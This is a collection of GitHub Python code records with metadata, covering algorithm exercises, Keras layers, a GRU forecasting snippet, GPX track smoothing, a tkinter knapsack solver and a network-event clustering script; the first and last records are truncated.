regressorGRU.predict(X_train)\r\ntest_predict = regressorGRU.predict(X_test)\r\n\r\ntrain_predict = scalar.inverse_transform(train_predict)\r\ntest_predict = scalar.inverse_transform(test_predict)\r\nmath.sqrt(mean_squared_error(y_train, train_predict))\r\nmath.sqrt(mean_squared_error(ytest, test_predict))\r\n\r\nplot_predictions(ytest, predicted_with_gru)\r\n\r\nreturn_rmse(ytest, predicted_with_gru)\r\n# shift train predictions for plotting\r\nlook_back=100\r\ntrainPredictPlot = numpy.empty_like(df1)\r\ntrainPredictPlot[:, :] = np.nan\r\ntrainPredictPlot[look_back:len(train_predict)+look_back, :] = train_predict\r\n# shift test predictions for plotting\r\ntestPredictPlot = numpy.empty_like(df1)\r\ntestPredictPlot[:, :] = numpy.nan\r\ntestPredictPlot[len(train_predict)+(look_back*2)+1:len(df1)-1, :] = test_predict\r\n# plot baseline 
and predictions\r\nplt.plot(scalar.inverse_transform(df1))\r\nplt.plot(trainPredictPlot)\r\nplt.plot(testPredictPlot)\r\nplt.show()\r\n","repo_name":"Sanskar1404/Major-project-technocolabs","sub_path":"GRU.py","file_name":"GRU.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"30686666395","text":"#마법사 상어와 토네이도\n\n#모래 계산하는 함수\ndef solve(time, dx, dy, direction):\n global answer, s_x, s_y\n\n # y좌표 계산 & x좌표 갱신\n for _ in range(time):\n s_x += dx\n s_y += dy\n if s_y < 0: #범위 밖에면 stop\n break\n\n # out_sand 구하기\n total = 0\n for x, y, z in direction:\n nx = s_x + x\n ny = s_y + y\n\n if z == 0:\n new_sand = sand[s_x][s_y] - total\n else:\n new_sand = int(sand[s_x][s_y] * z)\n total += new_sand\n\n if 0 <= nx < n and 0 <= ny < n:\n sand[nx][ny] += new_sand\n else:\n answer += new_sand\n\n\n\nimport sys\nn = int(sys.stdin.readline().rstrip())\nsand = [list(map(int, sys.stdin.readline().rstrip().split())) for _ in range(n)]\n\nleft = [(1, 1, 0.01), (-1, 1, 0.01), (1, 0, 0.07), (-1, 0, 0.07), (1, -1, 0.1),\n (-1, -1, 0.1), (2, 0, 0.02), (-2, 0, 0.02), (0, -2, 0.05), (0, -1, 0)]\nright = [(x, -y, z) for x, y, z in left]\ndown = [(-y, x, z) for x, y, z in left]\nup = [(y, x, z) for x, y, z in left]\n\ns_x, s_y = n // 2, n // 2\nanswer = 0\n\nfor i in range(1, n + 1):\n if i % 2:\n solve(i, 0, -1, left)\n solve(i, 1, 0, down)\n else:\n solve(i, 0, 1, right)\n solve(i, -1, 0, up)\nprint(answer)","repo_name":"jisuuuu/Algorithm_Study","sub_path":"Baekjoon/Baekjoon_python/boj_20057.py","file_name":"boj_20057.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23774558161","text":"'''\n1306. Jump Game III\nMedium\n\nGiven an array of non-negative integers arr, you are initially positioned at start index of the array. 
When you are at index i, you can jump to i + arr[i] or i - arr[i]; check if you can reach any index with value 0.\n\nNotice that you can not jump outside of the array at any time.\n\n \n\nExample 1:\n\nInput: arr = [4,2,3,0,3,1,2], start = 5\nOutput: true\nExplanation: \nAll possible ways to reach index 3 with value 0 are: \nindex 5 -> index 4 -> index 1 -> index 3 \nindex 5 -> index 6 -> index 4 -> index 1 -> index 3 \n\nExample 2:\n\nInput: arr = [4,2,3,0,3,1,2], start = 0\nOutput: true \nExplanation: \nOne possible way to reach index 3 with value 0 is: \nindex 0 -> index 4 -> index 1 -> index 3\n\nExample 3:\n\nInput: arr = [3,0,2,1,2], start = 2\nOutput: false\nExplanation: There is no way to reach index 1 with value 0.\n\n \n\nConstraints:\n\n    1 <= arr.length <= 5 * 10^4\n    0 <= arr[i] < arr.length\n    0 <= start < arr.length\n'''\n# O(n) time, O(n) space\nclass Solution:\n    def canReach(self, arr: [int], start: int) -> bool:\n        self.visited = set()\n        def helper(i):\n            if i >= len(arr) or i < 0: return False\n            if i in self.visited: return False\n            self.visited.add(i)\n            if arr[i] == 0:\n                return True\n            return helper(i+arr[i]) or helper(i-arr[i])\n        return helper(start)\n\n# O(n) time, O(1) space (not counting recursive stack), dfs\nclass Solution:\n    def canReach(self, arr: [int], start: int) -> bool:\n        if start < 0 or start >= len(arr) or arr[start] < 0:\n            return False\n        arr[start] *= -1\n        return arr[start] == 0 or self.canReach(arr, start + arr[start]) or self.canReach(arr, start - arr[start])\n\n# O(n) time, O(n) space, bfs\nfrom collections import deque\nclass Solution:\n    def canReach(self, arr: [int], start: int) -> bool:\n        q = deque([start])\n        while q:\n            curr = q.popleft()\n            if arr[curr] == 0: return True\n            if arr[curr] < 0: continue\n            if curr + arr[curr] < len(arr):\n                q.append(curr+arr[curr])\n            if curr - arr[curr] >= 0:\n                q.append(curr-arr[curr])\n            arr[curr] *= -1\n        return False\n\narr = [4,2,3,0,3,1,2]\nstart = 5\n# Output: true\n\n# arr = [4,2,3,0,3,1,2]\n# start = 0\n# # Output: true \n\n# arr = [3,0,2,1,2]\n# start = 2\n# Output: false\n\nsol = Solution()\nprint(sol.canReach(arr, start))\n","repo_name":"jomesh18/Leetcode","sub_path":"Leetcode_challenge/2021/12. 
December 2021/9.canReach.py","file_name":"9.canReach.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11657609090","text":"import json\r\n\r\n# Load the data from the large file\r\nwith open('../news_links_vietnambiz.json', 'r', encoding='utf-8') as f:\r\n data = json.load(f)\r\n\r\n# Find the midpoint of the data\r\nmidpoint = len(data) // 2\r\n\r\n# Split the data into two halves\r\ndata1 = data[:midpoint]\r\ndata2 = data[midpoint:]\r\n\r\n# Write the first half of the data to a new file\r\nwith open('../news_links_vietnambiz_1.json', 'w', encoding='utf-8') as f:\r\n json.dump(data1, f, ensure_ascii=False, indent=4)\r\n\r\n# Write the second half of the data to another new file\r\nwith open('../news_links_vietnambiz_2.json', 'w', encoding='utf-8') as f:\r\n json.dump(data2, f, ensure_ascii=False, indent=4)\r\n","repo_name":"Karej/News_classification","sub_path":"utils/split_json.py","file_name":"split_json.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25481984460","text":"import re\n\nfrom keras import backend as K\n\nfrom keras import activations\nfrom keras import initializers\nfrom keras import regularizers\n\nfrom keras.engine.topology import Layer\nfrom keras.layers import concatenate, GlobalMaxPooling1D, Dropout\n\n\nclass PropositionInputLayer(Layer):\n \"\"\"\n custom keras layer to compute the input for a ASNet proposition module\n \"\"\"\n\n def __init__(self,\n hidden_representation_size,\n proposition,\n related_propositional_action_ids,\n **kwargs):\n \"\"\"\n :param hidden_representation_size: hidden representation size used by every\n module (= size of module outputs)\n :param proposition: propostion the input model is built for\n :param related_propositional_action_ids: list of nested lists\n each nested list corresponds to one action schema related to the underlying predicate\n of proposition. All these actions whose ids are in the nested list are related to proposition\n \"\"\"\n self.hidden_representation_size = hidden_representation_size\n self.proposition = proposition\n self.related_propositional_action_ids = related_propositional_action_ids\n super(PropositionInputLayer, self).__init__(**kwargs)\n\n\n def build(self, input_shape):\n super(PropositionInputLayer, self).build(input_shape)\n\n\n def call(self, inputs):\n \"\"\"\n :param inputs: concatenation of all action module outputs of the last action layer\n :return: concatenation of the outputs of the related actions\n Thereby, actions with the same unterlying action schema (grouped in one nested list\n in related_action_ids) are pooled together. 
If there are no such actions for one\n nested list, then use a zero tensor of the necessary size\n \"\"\"\n # collect outputs of related action modules in last layer and pool all outputs together of\n # action modules of the same underlying action schema\n pooled_related_outputs = []\n for action_schema_list in self.related_propositional_action_ids:\n # collect outputs of all actions in the nested action_schema_list\n action_schema_outputs = []\n for index in action_schema_list:\n action_schema_outputs.append(inputs[:, self.hidden_representation_size * index: self.hidden_representation_size * (index + 1)])\n # concatenate outputs\n if not action_schema_outputs:\n # There were no related propositional actions of the corresponding action schema\n # -> create hidden-representation-sized vector of 0s\n # inputs.shape[0] matches batch_size\n shape_like_tensor = inputs[:, 0: self.hidden_representation_size]\n zeros = K.zeros_like(shape_like_tensor)\n pooled_related_outputs.append(zeros)\n else:\n if len(action_schema_outputs) > 1:\n concat_tensors = []\n for tensor in action_schema_outputs:\n # expand tensor dim for global max pooling afterwards (shrinks second dimension)\n concat_tensors.append(K.expand_dims(tensor, 1))\n # concatenate those expanded tensors along the second axis (\"besides\" for pooling these together)\n concatenated_output = concatenate(concat_tensors, 1)\n # apply global max pooling\n pooled_output = GlobalMaxPooling1D()(concatenated_output)\n pooled_related_outputs.append(pooled_output)\n else:\n # there is only one action of the action schema outputs\n pooled_related_outputs.append(action_schema_outputs[0])\n\n # concatenate all pooled related output tensors to new input tensor for module\n if len(pooled_related_outputs) > 1:\n layer_name = \"prop_input_final_concat_\" + re.sub(r\"\\W+\", \"\", self.proposition.__str__())\n return concatenate(pooled_related_outputs, name=layer_name)\n else:\n return pooled_related_outputs[0]\n\n\n def compute_output_shape(self, input_shape):\n assert len(input_shape) == 2\n return (input_shape[0], len(self.related_propositional_action_ids) * self.hidden_representation_size)\n\n\nclass PropositionModuleLayer(Layer):\n \"\"\"\n custom keras layer to implement ASNet proposition module\n \"\"\"\n\n def __init__(self,\n hidden_representation_size,\n activation,\n dropout,\n kernel_initializer,\n bias_initializer,\n regularizer_value,\n **kwargs):\n \"\"\"\n :param hidden_representation_size: hidden representation size used by every\n module (= size of module outputs)\n :param activation: name of activation function to be used in all modules\n of all layers but the last output layer\n :param dropout rate used in every intermediate node\n :param kernel_initializer: initializer to be used for all weight matrices/ kernels\n of all modules\n :param bias_initializer: initializer to be used for all bias vectors\n of all modules\n :param regularizer_value: value used for all L2 regularizations applied\n to all weights (-matrices and bias vectors!)\n \"\"\"\n self.hidden_representation_size = hidden_representation_size\n self.activation = activations.get(activation)\n self.dropout = dropout\n self.kernel_initializer = initializers.get(kernel_initializer)\n self.bias_initializer = initializers.get(bias_initializer)\n self.regularizer_value = regularizer_value\n super(PropositionModuleLayer, self).__init__(**kwargs)\n\n\n def build(self, input_shape):\n self.kernel = self.add_weight(name='kernel', \n shape=(input_shape[1], 
self.hidden_representation_size),\n initializer=self.kernel_initializer,\n regularizer=regularizers.l2(self.regularizer_value),\n trainable=True)\n self.bias = self.add_weight(name='bias',\n shape=(self.hidden_representation_size,),\n initializer=self.bias_initializer,\n regularizer=regularizers.l2(self.regularizer_value),\n trainable=True)\n super(PropositionModuleLayer, self).build(input_shape)\n\n\n def call(self, inputs):\n output = K.dot(inputs, self.kernel)\n output = K.bias_add(output, self.bias)\n output = self.activation(output)\n if self.dropout:\n return Dropout(self.dropout)(output)\n return output\n\n\n def compute_output_shape(self, input_shape):\n assert len(input_shape) == 2\n return (input_shape[0], self.hidden_representation_size)","repo_name":"LukasSchaefer/ASNets_FastDownward","sub_path":"network_models/asnets/custom_keras_layers/proposition_module_layer.py","file_name":"proposition_module_layer.py","file_ext":"py","file_size_in_byte":7109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"4112796800","text":"import requests\r\nimport pandas as pd\r\n\r\n# your_class = input(\"input your class:\")\r\nyour_class = 920611\r\nurl = f\"https://iis.bsuir.by/api/v1/schedule?studentGroup={your_class}\"\r\n\r\n\r\nres = requests.get(url)\r\nschedules = res.json()[\"schedules\"]\r\ntimetable = []\r\nfor week in schedules:\r\n weekday = week[\"weekDay\"]\r\n for schedule in week[\"schedule\"]:\r\n auditory = schedule[\"auditory\"][0]\r\n name = schedule[\"employee\"][0][\"firstName\"] + ' ' + \\\r\n schedule[\"employee\"][0][\"middleName\"] + ' ' + schedule[\"employee\"][0][\"lastName\"]\r\n lessonTime = schedule[\"lessonTime\"]\r\n lessonType = schedule[\"lessonType\"]\r\n weekNumber = schedule[\"weekNumber\"]\r\n subject = schedule[\"subject\"]\r\n subjectFullName = schedule[\"subjectFullName\"]\r\n timetable.append({\"auditory\": auditory,\r\n \"name\": name,\r\n \"lessonTime\": lessonTime,\r\n \"lessonType\": lessonType,\r\n \"weekday\": weekday,\r\n \"weekNumber\": weekNumber,\r\n \"subject\": subject,\r\n \"subjectFullName\": subjectFullName})\r\ndf = pd.DataFrame(timetable)\r\ndf.to_json(\"a.csv\")\r\nprint(df)\r\nres.close()\r\n","repo_name":"Jason4019/timetable","sub_path":"timetable/timetable.py","file_name":"timetable.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"21475339749","text":"class Solution:\n def minAreaFreeRect(self, points: List[List[int]]) -> float:\n \n def calDis(p1, p2):\n return (p1[0]-p2[0])**2.0 + (p1[1]-p2[1])**2.0\n \n ans = math.inf\n check = set()\n for point in points:\n check.add(str(point))\n \n for a in points:\n for b in points:\n if a == b: continue\n for c in points:\n if a == c or b == c: continue\n if calDis(a,b) + calDis(b,c) == calDis(a,c):\n d = [a[0] + c[0] - b[0], a[1] + c[1] - b[1]]\n if str(d) in check:\n ans = min(ans, math.sqrt(calDis(a,b)) * math.sqrt(calDis(b,c)))\n if ans == math.inf:\n return 0\n else:\n return ans\n \n","repo_name":"notruilin/LeetCode","sub_path":"963. 
Minimum Area Rectangle II/minAreaFreeRect.py","file_name":"minAreaFreeRect.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"34623868758","text":"import math\nimport os\n\n\ndef clear():\n if os.name == 'nt':\n os.system('cls') # Windows Console Command\n else:\n os.system('clear') # Unix-like Console Command\n\n\ndef print_menu():\n clear()\n print('Conversion Menu')\n print('#' * 40)\n print('1. Meter to Mile')\n print('2. Gram to Pound')\n print('3. Celsius to Fahrenheit')\n print('4. Degree to Radian')\n print('q. 종료')\n print('#' * 40)\n\n\ndef meter_to_mile():\n clear()\n print('Meter to Mile Conversion')\n print('#' * 40)\n meter = input('meter: ')\n print(f'{meter} meter >> {float(meter) / 1609} mile')\n input('press enter to exit')\n\n\ndef gram_to_pound():\n clear()\n print('Gram to Pound Conversion')\n print('#' * 40)\n gram = input('gram: ')\n print(f'{gram} gram >> {float(gram) / 453.6} pound')\n input('press enter to exit')\n\n\ndef celsius_to_fahrenheit():\n clear()\n print('Celsius to Fahrenheit Conversion')\n print('#' * 40)\n celsius = input('celsius: ')\n print(f'{celsius} celsius >> {float(celsius) * (9 / 5) + 32} fahrenheit')\n input('press enter to exit')\n\n\ndef degree_to_radian():\n clear()\n print('Degree to Radian Conversion')\n print('#' * 40)\n degree = input('degree: ')\n print(f'{degree} degree >> {float(degree) * (math.pi / 180)} radian')\n input('press enter to exit')\n\n\ndef main():\n while True:\n print_menu()\n menu = input('i: ')\n if menu == '1':\n meter_to_mile()\n elif menu == '2':\n gram_to_pound()\n elif menu == '3':\n celsius_to_fahrenheit()\n elif menu == '4':\n degree_to_radian()\n elif menu == 'q':\n break\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"NULL0xFF/2022-python-basic","sub_path":"week02/mini_project.py","file_name":"mini_project.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34712361775","text":"#WRITE YOUR CODE IN THIS FILE\r\n#define function\r\n#add parameters\r\ndef close10(x, y):\r\n#if then else\r\n if abs(x - 10) > abs(y - 10):\r\n return y\r\n elif abs(x - 10) < abs(y - 10):\r\n return x\r\n else:\r\n return 0\r\n#run function\r\nprint(close10(13, -13))","repo_name":"Introduction-to-Programming-OSOWSKI/2-4-closer-to-10-Madison-Skogsberg-2023","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74594360872","text":"#!/usr/bin/env python\nimport matplotlib.pyplot as plt\nimport csv\nimport sys\n'''\n ./plot_mount.py input\n'''\n\nfile_arr = ['10,10', '50,50','100,100', '1000,1000']\nmount = 'mount'\nX = [1, 2, 3, 4]\nx = []\ny = []\nfor num in file_arr:\n temp = []\n f = mount+num\n inf = open(f, 'r')\n lines = inf.readlines()\n for line in lines:\n temp.append(float(line.split()[1][2:-1]))\n x.append(num)\n y.append(sum(temp)/len(temp))\n\nplt.bar(X, y,width=0.2,label='vanilla',edgecolor='black')\nplt.legend()\nplt.xticks(X, x)\nplt.title('mount time comparison')\nplt.xlabel('partition 
size')\nplt.ylabel('time(s)')\nplt.show()\n","repo_name":"JackChuang/LinuxKernelProgramming","sub_path":"p6/prototype-parallel/user/plot_mount.py","file_name":"plot_mount.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14154456417","text":"import numpy as np\nimport pandas as pd\nimport datetime\nfrom utils import *\n\nfrom preprocess import *\nimport nerd\n\nfrom scipy.spatial.distance import squareform, pdist\n\nimport TemporalClusterer\n\n#import umap\nimport hdbscan\nimport dCollector\n\n\nif __name__ == '__main__':\n\n # Load preprocessed files\n days = int(sys.argv[4])\n intervals = list(pd.date_range(sys.argv[2], sys.argv[3]))\n for idx in range(0, len(intervals), days):\n print(f\"Processing files for {intervals[idx].date().isoformat()} - {intervals[idx+days-1].date().isoformat()}\")\n (df, file_list) = load_files(sys.argv[1], intervals[idx].date().isoformat(), intervals[idx+days-1].date().isoformat())\n\n print(\"Clustering\")\n tc = TemporalClusterer.TemporalClusterer(min_events=sys.argv[5], max_activity=sys.argv[6],\n dist_threshold=sys.argv[7])\n df['labels'] = tc.fit_transform(df, [])\n\n print(\"Running post process\")\n (clusters, series, score) = tc.post_process(df, file_list, query_nerd=True)\n\n # Ranking of clusters, to pick what to focus on\n top10 = clusters.sort_values(by=['score', 'size'], ascending=False).head(10)\n\n intervals = sample_intervals(series, file_list[0], tc.aggregation) # tc.aggregations should be same as\n # with series\n\n # only if you want flows and more data\n df_flows = pd.Series(dtype=object)\n df_nerd = pd.DataFrame()\n\n if sys.argv[8] == 'True':\n df_flows = clusters_get_flows(top10['ips'], intervals.loc[top10.index])\n\n df_ip = df.loc[df['labels'] > -1, ['ip', 'labels']].loc[df['labels'] > -1]\n df_ip = df_ip.groupby('ip').agg(cluster=('labels', min))\n nerdC = nerd.NerdC()\n df_nerd = nerdC.ip_req(df_ip.index.values)\n\n df_nerd['cluster'] = df_ip\n del df_ip\n\n df_flow_views = flows_get_views(df_flows)\n\n store_analysis(f'./data/{file_list[0]}_{file_list[-1]}/', df.loc[df['labels']>-1, :], clusters, series,\n df_nerd, df_flows, df_flow_views[0], df_flow_views[1])\n\n","repo_name":"CESNET/SECT","sub_path":"DistTemporalClusterer.py","file_name":"DistTemporalClusterer.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31100081738","text":"# 숨바꼭질 2\n# 너비 우선 탐색\n\nfrom collections import deque\nN,K = map(int,input().split())\nworld = [0]*100001\nworld[N] = 1\nminimum = 0\nans = 0\nqueue = deque([[N,0]])\nwhile len(queue) :\n pos,time = queue.popleft()\n world[pos] = 1\n if minimum and pos == K and minimum == time :\n # 답이 한번 더 나왔으므로, 답 개수에 추가\n ans += 1\n if not minimum and pos == K :\n # 첫 답\n ans += 1\n minimum = time\n if pos-1 > -1 and world[pos-1] == 0:\n queue.append([pos-1,time+1])\n if pos*2 < 100001 and world[pos*2] == 0:\n # 순간이동\n queue.append([pos*2,time+1])\n if pos+1 < 100001 and world[pos+1] == 0:\n queue.append([pos+1,time+1])\nprint(minimum)\nprint(ans)","repo_name":"halionaz/Algorithm","sub_path":"baekjoon/12851.py","file_name":"12851.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"15252705497","text":"import re\nimport fileinput\nimport sys\nimport tempfile\nimport time\nimport multiprocessing as mp\nfrom 
gpxpy import geo as mod_geo\nfrom . import functions\nfrom datetime import datetime\nimport copy\n\ndef getgpxstring(filename,algo=2):\n    with open(filename, 'r') as f:\n        gpx_file_data=f.read()\n    return gpx_file_data\n\ndef smoothengpxfilename(filename, algo=2) :\n    with open(filename, 'r') as f:\n        gpxdata=f.read()\n    gpxdata_smooth,lat,lon,ele,latsmooth,lonsmooth,elesmooth = smoothengpx(gpxdata,algo)\n    return gpxdata_smooth,lat,lon,ele,latsmooth,lonsmooth,elesmooth\n\ndef smoothengpx(gpx_file_smooth_data, algo, return_dict=None) :\n    \n    infile = tempfile.NamedTemporaryFile('w',1)\n    infile.write(gpx_file_smooth_data)\n    tempfilename = infile.name\n\n    tempf = open(tempfilename, 'r')\n    temp = tempf.read()\n\n    lat,lon,ele,times = functions.getarraysfile(gpx_file_smooth_data)\n\n    latsmooth = list(lat)\n    lonsmooth = list(lon)\n    elesmooth = list(ele)\n    \n    # this is the smoothening algorithm\n    nsection=7\n    for sectionstart in range(0,len(lon)-1-nsection):\n        centslice = int(sectionstart+(nsection-1)/2)\n        lonslice = lon[sectionstart:sectionstart+nsection]\n        latslice = lat[sectionstart:sectionstart+nsection]\n        eleslice = ele[sectionstart:sectionstart+nsection]\n        timesslice = times[sectionstart:sectionstart+nsection]\n\n        if int(algo) == 0 :\n            import numpy as np\n            z = np.polyfit(lonslice,latslice,1)\n            p = np.poly1d(z)\n            xp = np.linspace(lonslice[0],lonslice[nsection-1], nsection)\n            stepsize = (lonslice[nsection-1]-lonslice[0])/100\n            dmin=1000;\n            for i in range(1,100):\n                d = mod_geo.distance(lonslice[0]+stepsize*i,p(lonslice[0]+stepsize*i),None,lonslice[(nsection-1)/2],latslice[(nsection-1)/2],None)\n                if d < dmin:\n                    dmin = d\n                    lonsmooth[centslice] = lonslice[0]+stepsize*i\n                    latsmooth[centslice] = p(lonslice[0]+stepsize*i)\n\n        if int(algo) == 1 :\n            lonsmooth[centslice] = sum(lonslice)/len(lonslice)\n            latsmooth[centslice] = sum(latslice)/len(latslice)\n            elesmooth[centslice] = sum(eleslice)/len(eleslice)\n        \n        # time limit on point average\n        if int(algo) == 2 :\n            midstamp = datetime.strptime(timesslice[int((nsection-1)/2)], \"%Y-%m-%dT%H:%M:%SZ\")\n            i=-1\n            while i < len(latslice)-1 :\n                i = i+1\n                thisstamp = datetime.strptime(timesslice[i], \"%Y-%m-%dT%H:%M:%SZ\")\n                delta = thisstamp - midstamp\n                delta = abs(delta)\n                if delta.seconds > 6 :\n                    latslice = latslice[:i] + latslice[i+1 :]\n                    lonslice = lonslice[:i] + lonslice[i+1 :]\n                    eleslice = eleslice[:i] + eleslice[i+1 :]\n                    timesslice = timesslice[:i] + timesslice[i+1 :]\n                    i = i-1\n\n            lonsmooth[centslice] = sum(lonslice)/len(lonslice)\n            latsmooth[centslice] = sum(latslice)/len(latslice)\n            elesmooth[centslice] = sum(eleslice)/len(eleslice)\n\n\n    distance=0\n    pos=0\n    i=-1\n    while i < len(lat)-1 :\n        i = i + 1\n        tempf.seek(pos)\n        line = tempf.readline()\n        pos = tempf.tell()\n        line = line + tempf.readline()\n        linevalues = re.findall(\"\\d+\\.\\d+\",line)\n        if(len(linevalues)==3):\n            thislat = float(linevalues[0])\n            thislon = float(linevalues[1])\n\n            newline = '    <trkpt lat=\"{0}\" lon=\"{1}\">\\n     <ele>{2:.1f}</ele>\\n'.format(latsmooth[i],lonsmooth[i],elesmooth[i])\n            gpx_file_smooth_data = gpx_file_smooth_data.replace(line,newline)\n\n        else :\n            i = i -1\n\n\n        # print(line,thislat,thislon)\n        \n        # if thislat == lat[i]:\n        #     if thislon == lon[i]:\n        #         if i > 0 :\n        #             distance = distance + mod_geo.distance(latsmooth[i],lonsmooth[i],elesmooth[i],latsmooth[i-1],lonsmooth[i-1],elesmooth[i-1])\n        \n        #         newline = '    <trkpt lat=\"{0}\" lon=\"{1}\">\\n     <ele>{2:.1f}</ele>\\n'.format(latsmooth[i],lonsmooth[i],elesmooth[i])\n        #         #newline = '    \\n     {2:.1f}\\n    \\n     {3:.2f}\\n    \\n'.format(latsmooth[i],lonsmooth[i],elesmooth[i],distance)\n        #         gpx_file_smooth_data = 
gpx_file_smooth_data.replace(line,newline)\n # break\n\n if return_dict == None :\n return gpx_file_smooth_data,lat,lon,ele,latsmooth,lonsmooth,elesmooth\n\n return_dict[0] = gpx_file_smooth_data\n return_dict[1] = lat\n return_dict[2] = lon\n return_dict[3] = ele\n return_dict[4] = latsmooth\n return_dict[5] = lonsmooth\n return_dict[6] = elesmooth\n\n\n\ndef runsmoothengpx(args) :\n manager = mp.Manager()\n return_dict = manager.dict()\n if len(args) == 1 :\n args = args + (2,)\n args = args + (return_dict,)\n proc=mp.Process(target=smoothengpx,args=args)\n #proc.daemon=True\n proc.start()\n proc.join()\n return return_dict.values()[0],return_dict.values()[1],return_dict.values()[2],return_dict.values()[3],return_dict.values()[4],return_dict.values()[5],return_dict.values()[6]\n\n \n\ndef writeoutput(filename,gpx) :\n print('File created: {}'.format(filename))\n with open(filename, 'w') as file :\n file.write(gpx)\n\n\ndef main(filename,algo=2):\n gpxsmooth,lat,lon,ele,latsmooth,lonsmooth,elesmooth = smoothengpxfilename(filename,algo)\n newfilename = filename.replace('.gpx','_smooth.gpx')\n writeoutput(newfilename,gpxsmooth)\n return gpxsmooth,lat,lon,ele,latsmooth,lonsmooth,elesmooth\n\n\nif __name__ == \"__main__\":\n\n filename = sys.argv[1]\n\n if len(sys.argv) > 1 :\n algo = 2\n if len(sys.argv) > 2 :\n algo = sys.argv[2]\n\n main(filename, algo)\n\n\n","repo_name":"jonderwaater/smoothify","sub_path":"smoothify/smoothen.py","file_name":"smoothen.py","file_ext":"py","file_size_in_byte":6040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37631202860","text":" \n\"\"\" KNAPSACK SOLVER \"\"\"\nfrom tkinter import Menu, Button, StringVar, OptionMenu, messagebox as msg, filedialog, Tk\nfrom file_parser import fileparser\nfrom greedy import greedy\nfrom item import value, Item, density, weightInverse\ndef helpmenu():\n \"\"\" help menu \"\"\"\n msg.showinfo(\"Help\", \"A knapsack Problem solver\")\n\ndef aboutmenu():\n \"\"\" about menu \"\"\"\n msg.showinfo(\"About\", \"Version 1.0\")\n\nclass KnapsackSolver():\n \"\"\" KNAPSACK SOLVER CLASS \"\"\"\n def __init__(self, master):\n self.master = master\n self.master.title(\"KNAPSACK_SOLVER\")\n self.master.geometry(\"250x120\")\n self.master.resizable(False, False)\n self.filed = \"\"\n self.solution = {}\n self.listofitems = []\n #menu\n self.menu = Menu(self.master)\n self.file_menu = Menu(self.menu, tearoff=0)\n self.file_menu.add_command(label=\"Insert a file\",\n accelerator='Ctrl+O', command=self.insertfile)\n self.file_menu.add_command(label=\"Solve\", accelerator='Alt+F5', command=self.solve)\n self.file_menu.add_command(label=\"Save Solution\", accelerator='Ctrl+S', command=self.save_solution)\n self.file_menu.add_command(label=\"Close file\", accelerator=\"Ctrl+F5\", command=self.cf)\n self.file_menu.add_command(label=\"Exit\", accelerator='Alt+F4', command=self.exitmenu)\n self.menu.add_cascade(label=\"File\", menu=self.file_menu)\n self.show_menu = Menu(self.menu, tearoff=0)\n self.show_menu.add_command(label=\"Show Solution\", accelerator='Ctrl+F4',\n command=self.show_solution)\n self.menu.add_cascade(label=\"Show\", menu=self.show_menu)\n self.about_menu = Menu(self.menu, tearoff=0)\n self.about_menu.add_command(label=\"About\", accelerator='Ctrl+I', command=aboutmenu)\n self.menu.add_cascade(label=\"About\", menu=self.about_menu)\n self.help_menu = Menu(self.menu, tearoff=0)\n self.help_menu.add_command(label=\"Help\", accelerator='Ctrl+F1', command=helpmenu)\n 
self.menu.add_cascade(label=\"Help\", menu=self.help_menu)\n        self.master.config(menu=self.menu)\n        self.master.bind('<Control-F4>', lambda event: self.show_solution())\n        self.master.bind('<Control-o>', lambda event: self.insertfile())\n        self.master.bind('<Alt-F5>', lambda event: self.solve())\n        self.master.bind('<Alt-F4>', lambda event: self.exitmenu())\n        self.master.bind('<Control-F5>', lambda event: self.cf())\n        self.master.bind('<Control-F1>', lambda event: helpmenu())\n        self.master.bind('<Control-i>', lambda event: aboutmenu())\n\n        self.binsert = Button(self.master, text=\"Insert a file\", command=self.insertfile)\n        self.binsert.pack()\n\n        setslist = list([\"WeightInverse\", \"Density\", \"Value\"])\n        self.varnumset = StringVar(master)\n        self.varnumset.set(setslist[0])\n        self.popupsetmenu = OptionMenu(self.master, self.varnumset, *setslist)\n        self.popupsetmenu.pack()\n    \n    \n    def cf(self):\n        \"\"\" closes the .txt file \"\"\"\n        if self.filed == \"\":\n            msg.showerror(\"ERROR\", \"NO FILE IMPORTED TO CLOSE\")\n        else:\n            self.filed = \"\"\n            self.listofitems = []\n            self.solution = {}\n            self.solvb.forget()\n            msg.showinfo(\"SUCCESS\", \"FILE CLOSED\")\n    def file_verification_gui(self):\n        \"\"\" inserted gui after verification \"\"\"\n        self.solvb = Button(self.master, text=\"Solve\", command=self.solve)\n        self.solvb.pack()\n\n    def file_verification(self):\n        \"\"\" verifies that the inserted file is a knapsack problem instance \"\"\"\n        if \".txt\" in self.filed:\n            try:\n                self.solution = {}\n                self.solvb = Button(self.master, text=\"Solve\", command=self.solve)\n                self.solvb.pack()\n                self.nofi, self.maxW, self.item, self.weight = fileparser(self.filed)\n                for i in range(len(self.item)):\n                    self.listofitems.append(Item(str(self.item[i]),\n                                                 